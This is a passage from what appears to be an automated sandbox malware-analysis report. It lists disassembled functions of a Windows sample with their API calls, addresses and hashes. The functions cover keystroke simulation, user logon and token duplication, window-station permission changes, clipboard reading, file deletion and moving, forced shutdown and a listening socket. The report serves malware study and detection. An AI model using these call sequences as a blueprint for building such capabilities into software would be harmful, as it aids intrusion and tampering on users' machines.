                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F501
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F519
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F528
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E8F557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 45d7dca222aa76e814c5dbab729ecc75a8b5ecdc539fc8abef026a8e50a5220b
                                                      • Instruction ID: 0eea81e461974eec740a100d6ba36ca6a7876bca8531e162b13a54ffbd0b8f52
                                                      • Opcode Fuzzy Hash: 45d7dca222aa76e814c5dbab729ecc75a8b5ecdc539fc8abef026a8e50a5220b
                                                      • Instruction Fuzzy Hash: 63314371A40218BFEB206BB65C4AFBF7E6CEB44B50F201076FA09F61D1C6B55D01AB61
                                                      Function 00E91201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                        • Part of subcall function 00E916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                        • Part of subcall function 00E916C3: GetLastError.KERNEL32 ref: 00E9174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E91286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E912A8
                                                      • CloseHandle.KERNEL32(?), ref: 00E912B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E912D1
                                                      • GetProcessWindowStation.USER32 ref: 00E912EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00E912F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E91310
                                                        • Part of subcall function 00E910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E911FC), ref: 00E910D4
                                                        • Part of subcall function 00E910BF: CloseHandle.KERNEL32(?,?,00E911FC), ref: 00E910E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0$Z
                                                      • API String ID: 22674027-1808616255
                                                      • Opcode ID: 2c828d3eb2f855ff8e84f2f92ff006541572b99da6b9fe7b033c1f461616df55
                                                      • Instruction ID: 896bd15f31c4fddcc1c92283a85ecca6fc2b1f00e9e5ff851ec4e26124394f7d
                                                      • Opcode Fuzzy Hash: 2c828d3eb2f855ff8e84f2f92ff006541572b99da6b9fe7b033c1f461616df55
                                                      • Instruction Fuzzy Hash: 1F81A27190020AAFEF119FA5DC49FEE7BB9EF08708F1451A9F925F62A0D7318955CB20
                                                      Function 00E90B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                        • Part of subcall function 00E910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                        • Part of subcall function 00E910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                        • Part of subcall function 00E910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E90BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E90C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E90C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E90C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E90C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E90C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E90CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 00E90CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E90CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E90D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E90D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D45
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D55
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90D65
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E90D78
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90D7F
                                                        • Part of subcall function 00E91193: GetProcessHeap.KERNEL32(00000008,00E90BB1,?,00000000,?,00E90BB1,?), ref: 00E911A1
                                                        • Part of subcall function 00E91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E90BB1,?), ref: 00E911A8
                                                        • Part of subcall function 00E91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E90BB1,?), ref: 00E911B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: cc4ca4d85de614b14835851f91a0f8facbf9fe6e70f25f140ff0b96f8cd43e1e
                                                      • Instruction ID: 61f8fb7f234382c35ad11eac2e324a3bb353e9e0c11da42c22745c89a652dcef
                                                      • Opcode Fuzzy Hash: cc4ca4d85de614b14835851f91a0f8facbf9fe6e70f25f140ff0b96f8cd43e1e
                                                      • Instruction Fuzzy Hash: 75716B7290020AAFDF10DFA6DC45FEEBBBCBF04318F544525E918B6291D771AA46CB60
                                                      Function 00EAEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(00ECCC08), ref: 00EAEB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EAEB37
                                                      • GetClipboardData.USER32(0000000D), ref: 00EAEB43
                                                      • CloseClipboard.USER32 ref: 00EAEB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEB87
                                                      • CloseClipboard.USER32 ref: 00EAEB91
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAEBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00EAEBC9
                                                      • GetClipboardData.USER32(00000001), ref: 00EAEBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEBE2
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAEC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EAEC38
                                                      • GetClipboardData.USER32(0000000F), ref: 00EAEC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EAEC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EAEC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAEC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAECD2
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EAECF3
                                                      • CountClipboardFormats.USER32 ref: 00EAED14
                                                      • CloseClipboard.USER32 ref: 00EAED59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: ffbee777ffb58e36c028d40664576b99d2c0598b5a6d79852b77977ca6229a41
                                                      • Instruction ID: 304f640174e9564914b038379856ce93b45e3e82c08f3de9b2b6f212e6131401
                                                      • Opcode Fuzzy Hash: ffbee777ffb58e36c028d40664576b99d2c0598b5a6d79852b77977ca6229a41
                                                      • Instruction Fuzzy Hash: 8E61B3341042019FD310DF24D889F6ABBE4AF89718F14656DF456BB2A1CB31ED0ACB62
                                                      Function 00EA698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA69BE
                                                      • FindClose.KERNEL32(00000000), ref: 00EA6A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA6A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA6A75
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA6AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA6ADF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: d75876433df4c58386d60c2378fb5e85f87006aa88a236635dbee073742eff5a
                                                      • Instruction ID: 649cb6e686de9ad661934edb40b5fcb130ae3caddc7dab74c691da020d7dbab0
                                                      • Opcode Fuzzy Hash: d75876433df4c58386d60c2378fb5e85f87006aa88a236635dbee073742eff5a
                                                      • Instruction Fuzzy Hash: ECD173B2508300AFC714EBA4C995EBBBBECAF89704F04591DF585E7191EB74DA04CB62
                                                      Function 00EA9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA9663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EA96A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00EA96BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA96D3
                                                      • FindClose.KERNEL32(00000000), ref: 00EA96DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA96FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA974A
                                                      • SetCurrentDirectoryW.KERNEL32(00EF6B7C), ref: 00EA9768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA9772
                                                      • FindClose.KERNEL32(00000000), ref: 00EA977F
                                                      • FindClose.KERNEL32(00000000), ref: 00EA978F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 80bb72946fad32d9db166ca7920a41377ab3a8d74f3c4c28ffd9f10df0bde1ba
                                                      • Instruction ID: c5e29b6a27d5c00f95d66f557299edbb5f0504ba1ed382c8dafef19e361fc355
                                                      • Opcode Fuzzy Hash: 80bb72946fad32d9db166ca7920a41377ab3a8d74f3c4c28ffd9f10df0bde1ba
                                                      • Instruction Fuzzy Hash: E031E3325006096FDB14EFB5DC08EEE77BC9F4E324F1050A6F914F60A1DB31E9458A20
                                                      Function 00EA979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA97BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA9819
                                                      • FindClose.KERNEL32(00000000), ref: 00EA9824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA9840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA9890
                                                      • SetCurrentDirectoryW.KERNEL32(00EF6B7C), ref: 00EA98AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA98B8
                                                      • FindClose.KERNEL32(00000000), ref: 00EA98C5
                                                      • FindClose.KERNEL32(00000000), ref: 00EA98D5
                                                        • Part of subcall function 00E9DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E9DB00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 86946056829065bc77d3f6aaf0ebb25dee96e84e3763772581abf7975d74c536
                                                      • Instruction ID: 7f7884ca8a80b3f6450a5eb1c470792bf40e3977921b5da1514d60bbe2837993
                                                      • Opcode Fuzzy Hash: 86946056829065bc77d3f6aaf0ebb25dee96e84e3763772581abf7975d74c536
                                                      • Instruction Fuzzy Hash: 0D31D4325006196EDF18EFB5EC48EEE77BC9F0B324F2051A5E914B60A1DB35E949CB20
                                                      Function 00EA8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00EA8257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA8267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA8273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA8310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 25e2283b6fa1029d8a36b054f3e10967c2b7e8aa45eec1cca7fe2e42fdc6d110
                                                      • Instruction ID: 437d438f9c3f5b59ac15d22964e84d56798cec212a5a493bfcf9ae37d6f88c76
                                                      • Opcode Fuzzy Hash: 25e2283b6fa1029d8a36b054f3e10967c2b7e8aa45eec1cca7fe2e42fdc6d110
                                                      • Instruction Fuzzy Hash: 25619D725043059FCB10EF60C8449AEB7E8FF89314F04582EF989A7251EB31F949CB92
                                                      Function 00E9D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9D122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E9D1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9D1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9D20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9D237
                                                        • Part of subcall function 00E9D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E9D21C,?,?), ref: 00E9D2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00E9D253
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 21170e334804a13e0843875f8b4a1481b48c498bce403b4ebf86896ae8f8f176
                                                      • Instruction ID: d94f386219935351aebdf9b29f681cf9cc8ec70d28c4faaa5f0c287ce8384d90
                                                      • Opcode Fuzzy Hash: 21170e334804a13e0843875f8b4a1481b48c498bce403b4ebf86896ae8f8f176
                                                      • Instruction Fuzzy Hash: 96617A3180911DAECF05EBE0DE969FDBBB5AF54304F246065E442771A2EB31AF09CB60
                                                      Function 00EAED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: e0be149f6c4662e9ee9cd50ddbce867052a1721ba43cde29d3cb6193fb9563a2
                                                      • Instruction ID: 9aa2c1278d1f44069e28c43cd4f42a0619174085dc27632687828ae78ed57534
                                                      • Opcode Fuzzy Hash: e0be149f6c4662e9ee9cd50ddbce867052a1721ba43cde29d3cb6193fb9563a2
                                                      • Instruction Fuzzy Hash: EE418B35204611AFD720CF26D888F59BBE1AF49319F24D0A9E419AF762C736FC42CB90
                                                      Function 00E9E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                        • Part of subcall function 00E916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                        • Part of subcall function 00E916C3: GetLastError.KERNEL32 ref: 00E9174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E9E932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: aca35fc8b38c2684144de454c4a8663696de6a1643423f9999dca343875c3be5
                                                      • Instruction ID: 5ca94b90195d7ae3e6f5a624a91080f4739617390760f86b6f75c64940812625
                                                      • Opcode Fuzzy Hash: aca35fc8b38c2684144de454c4a8663696de6a1643423f9999dca343875c3be5
                                                      • Instruction Fuzzy Hash: 8D014932A10311AFEF14A2B59C86FFF72ACA744754F242461FE03F22D2D9A15C448190
                                                      Function 00EB1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EB1276
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EB12BA
                                                      • WSAGetLastError.WSOCK32 ref: 00EB12C5
                                                      • closesocket.WSOCK32(00000000), ref: 00EB12F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00EB1303
                                                      • WSAGetLastError.WSOCK32 ref: 00EB130D
                                                      • closesocket.WSOCK32(00000000), ref: 00EB133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
